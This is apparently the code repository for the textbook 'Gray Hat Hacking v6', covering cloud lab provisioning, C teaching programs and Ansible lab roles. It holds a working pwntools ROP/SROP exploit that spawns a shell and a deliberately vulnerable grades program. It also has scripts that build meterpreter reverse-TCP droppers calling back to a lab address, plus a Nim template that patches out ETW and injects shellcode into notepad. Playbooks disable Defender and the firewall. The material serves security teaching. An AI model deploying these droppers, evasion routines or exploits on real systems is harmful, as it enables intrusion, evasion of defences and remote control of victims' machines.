echo "# Fixing Lincryopt... "
pushd .
cd /tmp
apt -y download libcrypt1
dpkg-deb -x libcrypt* .
cp -av lib/x86_64-linux-gnu/* /lib/x86_64-linux-gnu/
popd
fi
apt -y --fix-broken install
service sshd restart
echo "# Provisioning complete"
exit 0
================================================
FILE: CloudSetup/kali-base/kali.hcl
================================================
data "amazon-ami" "ghh_kali" {
filters = {
name = "debian-10-amd64*"
root-device-type = "ebs"
virtualization-type = "hvm"
}
most_recent = true
owners = ["136693071363"]
profile = "ghh"
region = "us-east-1"
}
# "timestamp" template function replacement
locals { timestamp = regex_replace(timestamp(), "[- TZ:]", "") }
source "amazon-ebs" "ghh_kali" {
ami_name = "ghh-kali-${local.timestamp}"
instance_type = "m3.large"
launch_block_device_mappings {
delete_on_termination = true
device_name = "/dev/xvda"
volume_size = 40
volume_type = "standard"
}
profile = "ghh"
region = "us-east-1"
source_ami = "${data.amazon-ami.ghh_kali.id}"
ssh_username = "admin"
}
build {
sources = ["source.amazon-ebs.ghh_kali"]
# This block can be enabled if you want to keep a SSH key for troubleshooting
#provisioner "shell-local" {
#inline = ["echo '${build.SSHPrivateKey}' > /tmp/'${build.Host}'-session.pem"]
#}
provisioner "file" {
destination = "/tmp/config.sh"
source = "config.sh"
}
provisioner "shell" {
expect_disconnect = "true"
inline = ["chmod 755 /tmp/config.sh", "sudo /tmp/config.sh"]
skip_clean = "true"
}
# This block can be enabled if you need to troubleshoot and pause builds to SSH and see what is happening
# provisioner "breakpoint" {
# disable = false
# note = "this is a breakpoint"
# }
}
================================================
FILE: CloudSetup/provision.sh
================================================
#!/bin/bash
AWS=`which aws`
JQ=`which jq`
if ! test -f "$AWS"; then
echo "AWS cli is required for execution, please install and try again"
exit
fi
if ! test -f "$JQ"; then
echo "JQ is required for execution, please install and try again"
fi
aws iam create-user --user-name ghh | tee user-out.json
aws iam create-access-key --user-name ghh | tee key-out.json
aws iam create-group --group-name ghh-group | tee group-out.json
aws iam add-user-to-group --user-name ghh --group-name ghh-group
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonEC2FullAccess
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonS3FullAccess
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/IAMFullAccess
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonSSMFullAccess
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonRoute53FullAccess
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AmazonEKSClusterPolicy
aws iam attach-group-policy --group-name ghh-group --policy-arn arn:aws:iam::aws:policy/AWSCloudFormationFullAccess
ACCT=$(aws sts get-caller-identity --profile=ghh --region=us-east-2 | jq -r '.Account')
cat eksall.template | sed -e s/ACCTNO/$ACCT/g > eksall.json
aws iam create-policy --profile=ghh --policy-name GHHEKSAll --policy-document file://eksall.json | tee policydata
ARN=$(cat policydata | jq -r '.Policy.Arn')
aws iam attach-group-policy --group-name ghh-group --profile=ghh --policy-arn $ARN
echo -e "[ghh]\naws_access_key_id = `jq .AccessKey.AccessKeyId key-out.json | cut -f 2 -d '"'`\naws_secret_access_key = `jq .AccessKey.SecretAccessKey key-out.json | cut -f 2 -d '"'`\n" >> ~/.aws/credentials
echo "Provisioning complete"
================================================
FILE: CloudSetup/server-2016-base/bootstrap.ps1
================================================
Write-Host "Disabling Telemetry..."
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0
Write-Host "Disabling Telemetry services..."
Get-Service -Name "diagnosticshub.standardcollector.service" | Set-Service -StartupType Disabled | Stop-Service # Microsoft (R) Diagnostics Hub Standard Collector Service
Get-Service -Name "DiagTrack" | Set-Service -StartupType Disabled | Stop-Service # Diagnostics Tracking Service
Write-Host "Installing Chocolatey"
Set-ExecutionPolicy Bypass -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))
Write-Host "Starting SendWindowsIsReady"
C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts\SendWindowsIsReady.ps1 -Schedule
Write-Host "Starting InitliazeInstance"
C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts\InitializeInstance.ps1 -Schedule
Write-Host "performing Sysprep"
C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts\SysprepInstance.ps1 -NoShutdown
Write-Host "SYSPREP Finished..."
================================================
FILE: CloudSetup/server-2016-base/server2016_template.json
================================================
{
"variables": {
"name": "ghh-server2016-{{timestamp}}",
"aws_region": "us-east-1",
"aws_instance_type": "m3.large",
"description": "GHH-Server-2016"
},
"builders": [
{
"name": "{{user `name`}}",
"profile": "ghh",
"type": "amazon-ebs",
"communicator": "winrm",
"winrm_username": "Administrator",
"ami_name": "{{user `name`}}",
"ami_description": "{{user `description`}}",
"region": "{{user `aws_region`}}",
"instance_type": "{{user `aws_instance_type`}}",
"availability_zone": "us-east-1a",
"encrypt_boot": false,
"launch_block_device_mappings": [
{
"device_name": "/dev/sda1",
"volume_type": "gp2",
"volume_size": 30,
"delete_on_termination": true
}
],
"source_ami_filter": {
"filters": {
"virtualization-type": "hvm",
"root-device-type": "ebs",
"name": "Windows_Server-2016-English-Full-Base-*",
"owner-alias": "amazon",
"architecture": "x86_64"
},
"owners": [
"801119661308"
],
"most_recent": true
},
"user_data_file": "user_data.ps1"
}
],
"provisioners": [
{
"type": "powershell",
"script": "bootstrap.ps1"
}
]
}
================================================
FILE: CloudSetup/server-2016-base/user_data.ps1
================================================
<powershell>
write-output "Running User Data Script"
write-host "(host) Running User Data Script"
Set-ExecutionPolicy Unrestricted -Scope LocalMachine -Force -ErrorAction Ignore
# Don't set this before Set-ExecutionPolicy as it throws an error
$ErrorActionPreference = "stop"
# Remove HTTP listener
Remove-Item -Path WSMan:\Localhost\listener\listener* -Recurse
# WinRM
write-output "Setting up WinRM"
write-host "(host) setting up WinRM"
cmd.exe /c winrm quickconfig -q
cmd.exe /c winrm quickconfig '-transport:http'
cmd.exe /c winrm set "winrm/config" '@{MaxTimeoutms="1800000"}'
cmd.exe /c winrm set "winrm/config/winrs" '@{MaxMemoryPerShellMB="1024"}'
cmd.exe /c winrm set "winrm/config/service" '@{AllowUnencrypted="true"}'
cmd.exe /c winrm set "winrm/config/client" '@{AllowUnencrypted="true"}'
cmd.exe /c winrm set "winrm/config/service/auth" '@{Basic="true"}'
cmd.exe /c winrm set "winrm/config/client/auth" '@{Basic="true"}'
cmd.exe /c winrm set "winrm/config/service/auth" '@{CredSSP="true"}'
cmd.exe /c winrm set "winrm/config/listener?Address=*+Transport=HTTP" '@{Port="5985"}'
cmd.exe /c netsh advfirewall firewall set rule group="remote administration" new enable=yes
cmd.exe /c netsh firewall add portopening TCP 5985 "Port 5985"
cmd.exe /c net stop winrm
cmd.exe /c sc config winrm start= auto
cmd.exe /c net start winrm
cmd.exe /c wmic useraccount where "name='vagrant'" set PasswordExpires=FALSE
</powershell>
================================================
FILE: CloudSetup/server-2019-base/bootstrap.ps1
================================================
Write-Host "Disabling Telemetry..."
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0
Set-ItemProperty -Path "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Policies\DataCollection" -Name "AllowTelemetry" -Type DWord -Value 0
Write-Host "Disabling Telemetry services..."
Get-Service -Name "diagnosticshub.standardcollector.service" | Set-Service -StartupType Disabled | Stop-Service # Microsoft (R) Diagnostics Hub Standard Collector Service
Get-Service -Name "DiagTrack" | Set-Service -StartupType Disabled | Stop-Service # Diagnostics Tracking Service
Write-Host "Installing Chocolatey"
Set-ExecutionPolicy Bypass -Scope Process -Force;
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072;
iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))
Write-Host "Starting SendWindowsIsReady"
C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts\SendWindowsIsReady.ps1 -Schedule
Write-Host "Starting InitliazeInstance"
C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts\InitializeInstance.ps1 -Schedule
Write-Host "performing Sysprep"
C:\ProgramData\Amazon\EC2-Windows\Launch\Scripts\SysprepInstance.ps1 -NoShutdown
Write-Host "SYSPREP Finished..."
================================================
FILE: CloudSetup/server-2019-base/server2019_template.json
================================================
{
"variables": {
"name": "ghh-server2019-{{timestamp}}",
"aws_region": "us-east-1",
"aws_instance_type": "m3.large",
"description": "GHH-Server-2019"
},
"builders": [
{
"name": "{{user `name`}}",
"profile": "ghh",
"type": "amazon-ebs",
"communicator": "winrm",
"winrm_username": "Administrator",
"ami_name": "{{user `name`}}",
"ami_description": "{{user `description`}}",
"region": "{{user `aws_region`}}",
"instance_type": "{{user `aws_instance_type`}}",
"availability_zone": "us-east-1a",
"encrypt_boot": false,
"launch_block_device_mappings": [
{
"device_name": "/dev/sda1",
"volume_type": "gp2",
"volume_size": 30,
"delete_on_termination": true
}
],
"source_ami_filter": {
"filters": {
"virtualization-type": "hvm",
"root-device-type": "ebs",
"name": "Windows_Server-2019-English-Full-Base-*",
"owner-alias": "amazon",
"architecture": "x86_64"
},
"owners": [
"801119661308"
],
"most_recent": true
},
"user_data_file": "user_data.ps1"
}
],
"provisioners": [
{
"type": "powershell",
"script": "bootstrap.ps1"
}
]
}
================================================
FILE: CloudSetup/server-2019-base/user_data.ps1
================================================
<powershell>
write-output "Running User Data Script"
write-host "(host) Running User Data Script"
Set-ExecutionPolicy Unrestricted -Scope LocalMachine -Force -ErrorAction Ignore
# Don't set this before Set-ExecutionPolicy as it throws an error
$ErrorActionPreference = "stop"
# Remove HTTP listener
Remove-Item -Path WSMan:\Localhost\listener\listener* -Recurse
# WinRM
write-output "Setting up WinRM"
write-host "(host) setting up WinRM"
cmd.exe /c winrm quickconfig -q
cmd.exe /c winrm quickconfig '-transport:http'
cmd.exe /c winrm set "winrm/config" '@{MaxTimeoutms="1800000"}'
cmd.exe /c winrm set "winrm/config/winrs" '@{MaxMemoryPerShellMB="1024"}'
cmd.exe /c winrm set "winrm/config/service" '@{AllowUnencrypted="true"}'
cmd.exe /c winrm set "winrm/config/client" '@{AllowUnencrypted="true"}'
cmd.exe /c winrm set "winrm/config/service/auth" '@{Basic="true"}'
cmd.exe /c winrm set "winrm/config/client/auth" '@{Basic="true"}'
cmd.exe /c winrm set "winrm/config/service/auth" '@{CredSSP="true"}'
cmd.exe /c winrm set "winrm/config/listener?Address=*+Transport=HTTP" '@{Port="5985"}'
cmd.exe /c netsh advfirewall firewall set rule group="remote administration" new enable=yes
cmd.exe /c netsh firewall add portopening TCP 5985 "Port 5985"
cmd.exe /c net stop winrm
cmd.exe /c sc config winrm start= auto
cmd.exe /c net start winrm
cmd.exe /c wmic useraccount where "name='vagrant'" set PasswordExpires=FALSE
</powershell>
================================================
FILE: README.md
================================================
# GHHv6
Gray Hat Hacking v6
================================================
FILE: ch02/client.py
================================================
#client.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('localhost', 4242))
s.send(b'Say something:') # b tag added in python3 to indicate bytes not str
data = s.recv(1024)
s.close()
print('Received', data)
================================================
FILE: ch02/fmt_str.c
================================================
#include <stdio.h>
int main(void){
double x = 23.5644;
printf("The value of x is %5.2f\n", x);
printf("The value of x is %4.1f\n", x);
return 0;
}
================================================
FILE: ch02/hello.asm
================================================
section .data ; section declaration
msg db "Hello, haxor!",0xa ; our string with a carriage return
len equ $ - msg ; length of our string, $ means here
section .text ; mandatory section declaration
; export the entry point to the ELF linker or
global _start ; loaders conventionally recognize
; _start as their entry point
_start:
; now, write our string to stdout
; notice how arguments are loaded in reverse
mov rdx,len ; third argument (message length)
mov rcx,msg ; second argument (pointer to message to write)
mov rbx,1 ; load first argument (file handle (stdout))
mov rax,4 ; system call number (4=sys_write)
int 0x80 ; call kernel interrupt and exit
mov rbx,0 ; load first syscall argument (exit code)
mov rax,1 ; system call number (1=sys_exit)
int 0x80 ; call kernel interrupt and exit
================================================
FILE: ch02/hello.c
================================================
// hello.c // customary comment of program name
#include <stdio.h> // needed for screen printing
int main(){ // required main function
printf("Hello haxor!\n"); // simply say hello
} // exit program
================================================
FILE: ch02/ifelse.c
================================================
#include <stdio.h>
int main(void){
int x = 0;
while(1){
if (x == 0) {
printf("x = %d\n", x);
x++;
continue;
}
else {
printf("x != 0\n");
break;
}
return 0;
}
}
================================================
FILE: ch02/meet.c
================================================
// meet.c
#include <stdio.h> // needed for screen printing
#include <string.h> // needed for strcpy
void greeting(char *temp1,char *temp2){ // greeting function to say hello
char name[400]; // string variable to hold the name
strcpy(name, temp2); // copy argument to name with the infamous strcpy
printf("Hello %s %s\n", temp1, name); // print out the greeting
}
int main(int argc, char * argv[]){ // note the format for arguments
greeting(argv[1], argv[2]); // call function, pass title & name
printf("Bye %s %s\n", argv[1], argv[2]); // say "bye"
} // exit program
================================================
FILE: ch02/memory.c
================================================
// memory.c
#include <stdlib.h>
#include <string.h>
/* memory.c */ // this comment simply holds the program name
int _index = 5; // integer stored in data (initialized)
char * str; // string stored in bss (uninitialized)
int nothing; // integer stored in bss (uninitialized)
void funct1(int c){ // bracket starts function1 block with argument (c)
int i=c; // stored in the stack region
str = (char*) malloc (10 * sizeof (char)); // Reserves 10 characters in
// the heap region
strncpy(str, "abcde", 5); // copies 5 characters "abcde" into str
} // end of function1
void main (){ // the required main function
funct1(1); // main calls function1 with an argument
} // end of the main function
================================================
FILE: ch02/targets
================================================
RPC-DCOM 10.10.20.1,10.10.20.4
SQL-SA-blank-pw 10.10.20.27,10.10.20.28
================================================
FILE: ch02/while_ex.c
================================================
#include <stdio.h>
int main(void){
int x = 0;
while (x<10) {
printf("x = %d\n", x);
x++;
}
return 0;
}
================================================
FILE: ch03/heapme_demo.c
================================================
//heapme_demo.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
void *x[8];
int main() {
for (int i=0; i < 8; i++) {
x[i] = malloc(0x38);
memset(x[i], (i + 0x30), 0x38);
}
for (int i=0; i < 8; i++)
free(x[i]);
fprintf(stderr, "Press CTRL+C to exit.\n");
pause();
return 0;
}
================================================
FILE: ch03/hello.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main() {
char *ghh = malloc(30);
strncpy(ghh, "Gray Hat Hacking", 16);
printf("%s - ", ghh);
free(ghh);
puts("6th Edition");
return 0;
}
================================================
FILE: ch03/leak-bof-exploit.py
================================================
#!/usr/bin/env python3
from pwn import *
context.update(arch='amd64', os='linux')
elf = ELF("./leak-bof")
libc = ELF("/usr/lib/x86_64-linux-gnu/libc-2.33.so")
p = process("./leak-bof")
l = log.progress("Stage 1: leak printf and calculate libc's base address")
p.readuntil(b"I'm leaking printf: ")
libc.address = int(p.readline(), 16) - libc.sym['printf']
l.success(f"0x{libc.address:x}")
rop = ROP(libc.file.name)
l = log.progress("Stage 2: pop a shell with ROP + SROP payload")
bin_sh = next(libc.search(b'/bin/sh'))
syscall = libc.address + rop.syscall.address
rop.raw(libc.address + rop.find_gadget(['pop rax', 'ret']).address)
rop.raw(constants.SYS_rt_sigreturn)
rop.raw(syscall)
# build SROP frame
frame = SigreturnFrame(kernel="amd64", arch="amd64")
frame.rax = constants.SYS_execve
frame.rdi = bin_sh
frame.rsi = 0
frame.rdx = 0
frame.rsp = bin_sh
frame.rip = syscall
# send stack smash and payload
p.sendlineafter(b": ", b"A"*136 + rop.chain() + bytes(frame))
l.success('Enjoy!')
p.interactive()
================================================
FILE: ch03/leak-bof.c
================================================
// leak-bof.c
#include <stdio.h>
#include <unistd.h>
void vuln() {
char buff[128];
printf("Overflows with 128 bytes: ");
fflush(stdout);
read(0, buff, 2000);
}
int main(int argc, char **argv) {
printf("I'm leaking printf: %p\n", (long)printf);
vuln();
}
================================================
FILE: ch04/students-patched.c
================================================
// students.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct {
char name[24];
int id;
int grades;
} Student;
char admin_password[32] = "Ultr4S3cr3tP4ssw0rd!";
Student students[32];
int count = 0;
void LoadStudents() {
memset(&students, 0, sizeof(Student)*32);
FILE *f = fopen("students.csv", "r");
if (!f) {
printf("ERROR: 'students.csv' database file missing!\n");
exit(0);
}
char line[128];
for (count=0; count < 32 && !feof(f); count++) {
fscanf(f, "%128s\n", &line);
char *coma = strchr(line, ',');
coma[0] = 0;
students[count].id = count;
strncpy(students[count].name, line, 24);
students[count].grades = atoi(&coma[1]);
}
fclose(f);
}
void ListStudents() {
printf("\nNum Name Grades\n");
for (int i = 0; i < count; i++) {
printf("%d - %s\t%6d\n", i, students[i].name, students[i].grades);
}
}
int ViewStudentGrades() {
int i;
printf("Enter student number: ");
scanf("%d", &i);
if (i < 0 || i > count) {
printf("Invalid student number!\n");
return -1;
}
printf("\nNum Name Grades\n");
printf("%d - %s\t%6d\n", i, students[i].name, students[i].grades);
return i;
}
void ChangeStudentGrades() {
char pass[32];
printf("Enter admin password: ");
scanf("%32s", &pass);
if (strcmp(pass, admin_password)) {
printf("Incorrect password!\n\n");
return;
}
int idx, grades;
if ((idx = ViewStudentGrades()) == -1) {
return;
}
printf("Enter new grades: ");
scanf("%d", &grades);
students[idx].grades = grades;
printf("\n%s's new grade is %d\n", students[idx].name, grades);
}
void main(void) {
int opt;
LoadStudents();
for (;;) {
printf(
"\n=========================\n"
" Grades Management \n"
"=========================\n"
" 1) List students\n"
" 2) View grades\n"
" 3) Change grades\n"
" 4) Exit\n"
"=========================\n"
"Enter option: ");
scanf("%i", &opt);
switch (opt) {
case 1: ListStudents(); break;
case 2: ViewStudentGrades(); break;
case 3: ChangeStudentGrades(); break;
case 4: return;
default: printf("Invalid Option!\n");
}
}
}
================================================
FILE: ch04/students.c
================================================
// students.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
typedef struct {
char name[24];
int id;
int grades;
} Student;
char admin_password[32] = "Ultr4S3cr3tP4ssw0rd!";
Student students[32];
int count = 0;
void LoadStudents() {
memset(&students, 0, sizeof(Student)*32);
FILE *f = fopen("students.csv", "r");
if (!f) {
printf("ERROR: 'students.csv' database file missing!\n");
exit(0);
}
char line[128];
for (count=0; count < 32 && !feof(f); count++) {
fscanf(f, "%128s\n", &line);
char *comma = strchr(line, ',');
comma[0] = 0;
students[count].id = count;
strncpy(students[count].name, line, 24);
students[count].grades = atoi(&comma[1]);
}
fclose(f);
}
void ListStudents() {
printf("\nNum Name Grades\n");
for (int i = 0; i < count; i++) {
printf("%d - %s\t%6d\n", i, students[i].name, students[i].grades);
}
}
int ViewStudentGrades() {
int i;
printf("Enter student number: ");
scanf("%d", &i);
/*VULN - Uncomment to compile Patched version
if (i < 0 || i > count) {
printf("Invalid student number!\n");
return -1;
}
VULN*/
printf("\nNum Name Grades\n");
printf("%d - %s\t%6d\n", i, students[i].name, students[i].grades);
return i;
}
void ChangeStudentGrades() {
char pass[32];
printf("Enter admin password: ");
scanf("%32s", &pass);
if (strcmp(pass, admin_password)) {
printf("Incorrect password!\n\n");
return;
}
int idx, grades;
if ((idx = ViewStudentGrades()) == -1) {
return;
}
printf("Enter new grades: ");
scanf("%d", &grades);
students[idx].grades = grades;
printf("\n%s's new grade is %d\n", students[idx].name, grades);
}
void main(void) {
int opt;
LoadStudents();
for (;;) {
printf(
"\n=========================\n"
" Grades Management \n"
"=========================\n"
" 1) List students\n"
" 2) View grades\n"
" 3) Change grades\n"
" 4) Exit\n"
"=========================\n"
"Enter option: ");
scanf("%i", &opt);
switch (opt) {
case 1: ListStudents(); break;
case 2: ViewStudentGrades(); break;
case 3: ChangeStudentGrades(); break;
case 4: return;
default: printf("Invalid Option!\n");
}
}
}
================================================
FILE: ch04/students.csv
================================================
Jordan,84
Milley,91
Debbie,65
Joseph,60
Xuang,98
Tamara,88
================================================
FILE: ch05/myAtoi.c
================================================
#include <stdio.h>
#include <stdlib.h>
int myAtoi(char *str){
int res = 0;
for (int i = 0; str[i] != '\0'; ++i)
res = res*10 + str[i] - '0';
return res;
}
int main(){
char str[] = "1234";
int val = myAtoi(str);
printf("Value is: %d\n", val);
return 0;
}
================================================
FILE: ch05/myProg.c
================================================
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int func1(char* input)
{
char string1[60];
strcpy(string1, input);
printf("You entered %s", string1);
return 0;
}
int main(int argc, char* argv[])
{
if(argc !=2){
printf("Usage: Enter Something\n");
exit(1);}
func1(argv[1]);
return 0;
}
================================================
FILE: ch07/Lab/ansible/ansible.cfg
================================================
[defaults]
host_key_checking = False
enable_task_debugger = True
================================================
FILE: ch07/Lab/ansible/ch07_playbook.yml
================================================
---
- hosts: dc
roles:
- common
- windows_dns_server
- windows_domain_controller
- windows_domain_users_groups
vars_files:
- vars/vars.yml
- vars/users.yml
- hosts: target
gather_facts: yes
roles:
- common
- windows_client_join_domain
- target_customizations
vars_files:
- vars/vars.yml
- hosts: kali
become: yes
roles:
- kali_customizations
vars_files:
- vars/vars.yml
- vars/users.yml
================================================
FILE: ch07/Lab/ansible/roles/common/defaults/main.yml
================================================
---
================================================
FILE: ch07/Lab/ansible/roles/common/handlers/main.yml
================================================
---
================================================
FILE: ch07/Lab/ansible/roles/common/meta/main.yml
================================================
---
galaxy_info:
role_name: install_misc_software
author: Russ Nolen rnolen@splunk.com
description: Install some basic software
license: BSD
min_ansible_version: 2.4
platforms:
- name: Windows
versions:
- 2012R2
- Win10
galaxy_tags:
- system
- security
dependencies: []
================================================
FILE: ch07/Lab/ansible/roles/common/tasks/chocolatey-components.yml
================================================
---
- name: Install Chocolately via Powershell
win_shell: "Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iwr https://chocolatey.org/install.ps1 -UseBasicParsing | iex
"
- name: Install notepadplusplus
win_chocolatey:
name: notepadplusplus
================================================
FILE: ch07/Lab/ansible/roles/common/tasks/main.yml
================================================
---
# need to wrap an if statement around this one
# make it windows specific
- name : Disable Windows Firewall
win_firewall:
state: disabled
- include: windows-disable-defender.yml
when: ansible_distribution is search ('Microsoft')
- include: chocolatey-components.yml
================================================
FILE: ch07/Lab/ansible/roles/common/tasks/windows-components.yml
================================================
---
- name: Install the Visual C++ Redistributable
win_package:
path: "https://download.microsoft.com/download/9/3/F/93FCF1E7-E6A4-478B-96E7-D4B285925B00/vc_redist.x64.exe"
product_id: '{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}'
arguments: /install /passive /norestart
================================================
FILE: ch07/Lab/ansible/roles/common/tasks/windows-disable-defender.yml
================================================
---
- name: Disable Windows Defender
win_regedit:
key: "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection"
value: DisableRealTimeMonitoring
datatype: dword
data: 1
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/addshare.txt
================================================
[ghh]
comment = GHH Share
browseable = yes
path = /tmp
printable = no
guest ok = yes
read only = yes
create mask = 0700
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/covenant.patch
================================================
--- /usr/share/kaboxer/covenant.kaboxer.orig 2021-09-12 19:28:35.392506176 +0000
+++ /usr/share/kaboxer/covenant.kaboxer.yaml 2021-09-12 18:54:26.224293412 +0000
@@ -26,6 +26,7 @@
publish_ports:
- 7443
- 443
+ - 80
before_run_script: |
#!/bin/sh
set -e
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/build_csharp.sh
================================================
#!/bin/bash
SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.40`
# Replae relevant lines
SC=${SC/buf/shellcode}
PRE=`grep -B 1000 INJECT csharp.template | grep -v INJECT`
POST=`grep -A 1000 INJECT csharp.template | grep -v INJECT`
# Format the output
echo "$PRE" > csharp.cs
echo "$SC" >> csharp.cs
echo "$POST" >> csharp.cs
mcs csharp.cs -out:/tmp/csharp_dropper64.exe
chmod 755 /tmp/csharp_dropper64.exe
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/build_go.sh
================================================
#!/bin/bash
SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f base64 --platform windows --arch x64 LHOST=10.0.0.40`
CODE=`cat go.template`
# Replae relevant lines
CODE=${CODE/INJECT/$SC}
echo "$CODE" > createFiber.go
GOOS=windows GOARCH=amd64 go build -o /tmp/CreateFiber.exe createFiber.go
chmod 755 /tmp/CreateFiber.exe
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/build_nim.sh
================================================
#!/bin/bash
SC=`msfvenom -p windows/x64/meterpreter_reverse_tcp -f csharp --platform windows --arch x64 LHOST=10.0.0.40`
# Replae relevant lines
ORIG="byte[] buf = new byte["
FIX="var shellcode: array["
SC=${SC/$ORIG/$FIX}
SC=${SC/]/,byte] = }
SC=${SC/\}/]}
SC=${SC/{/\[ byte }
SC=${SC/;/}
SC=${SC/\[ \[/\[}
SC=${SC//[$'\n']}
CODE=`cat nim.template`
CODE=${CODE/INJECTHERE/$SC}
echo "$CODE" > dropper.nim
nim c -d=mingw -b=cpp --passL="-static-libgcc -static-libstdc++" --app=console --cpu=amd64 --out=/tmp/nim_dropper64.exe dropper.nim
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/csharp.template
================================================
using System;
using System.Runtime.InteropServices;
namespace GHHSCLauncher
{
class Program
{
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_READWRITE = 0x04;
private static UInt32 PAGE_EXECUTE = 0x10;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
static extern bool VirtualProtect(IntPtr lpAddress, int dwSize, uint flNewProtect, out uint lpflOldProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId );
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds);
static void Main()
{
INJECT
UInt32 scAddress = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(scAddress), shellcode.Length);
uint prot;
VirtualProtect((IntPtr)(scAddress), shellcode.Length, PAGE_EXECUTE, out prot);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, scAddress, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return;
}
}
}
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/execute.template
================================================
import winim/lean
import strformat
import dynlib
import osproc
const patch: array[1, byte] = [byte 0xc3]
proc Patchntdll(): bool =
var
ntdll: LibHandle
cs: pointer
op: DWORD
t: DWORD
disabled: bool = false
ntdll = loadLib("ntdll")
if isNil(ntdll):
echo "[X] Failed to load ntdll.dll"
return disabled
cs = ntdll.symAddr("EtwEventWrite") # equivalent of GetProcAddress()
if isNil(cs):
echo "[X] Failed to get the address of 'EtwEventWrite'"
return disabled
if VirtualProtect(cs, patch.len, 0x40, addr op):
echo "[*] Applying patch"
copyMem(cs, unsafeAddr patch, patch.len)
VirtualProtect(cs, patch.len, op, addr t)
disabled = true
return disabled
proc injectCreateRemoteThread[I, T](shellcode: array[I, T]): void =
# Under the hood, the startProcess function from Nim's osproc module is calling CreateProcess() :D
let tProcess = startProcess("notepad.exe")
tProcess.suspend() # That's handy!
defer: tProcess.close()
echo "[*] Target Process: ", tProcess.processID
let pHandle = OpenProcess(
PROCESS_ALL_ACCESS,
false,
cast[DWORD](tProcess.processID)
)
defer: CloseHandle(pHandle)
echo "[*] pHandle: ", pHandle
let rPtr = VirtualAllocEx(
pHandle,
NULL,
cast[SIZE_T](shellcode.len),
MEM_COMMIT,
PAGE_EXECUTE_READ_WRITE
)
var bytesWritten: SIZE_T
let wSuccess = WriteProcessMemory(
pHandle,
rPtr,
unsafeAddr shellcode,
cast[SIZE_T](shellcode.len),
addr bytesWritten
)
echo "[*] WriteProcessMemory: ", bool(wSuccess)
echo " \\-- bytes written: ", bytesWritten
echo ""
let tHandle = CreateRemoteThread(
pHandle,
NULL,
0,
cast[LPTHREAD_START_ROUTINE](rPtr),
NULL,
0,
NULL
)
defer: CloseHandle(tHandle)
echo "[*] tHandle: ", tHandle
echo "[+] Injected"
INJECTHERE
# This is essentially the equivalent of 'if __name__ == '__main__' in python
when isMainModule:
var success = Patchntdll()
echo fmt"[*] ETW blocked by patch: {bool(success)}"
injectCreateRemoteThread(shellcode)
================================================
FILE: ch07/Lab/ansible/roles/kali_customizations/files/shells/go.mod
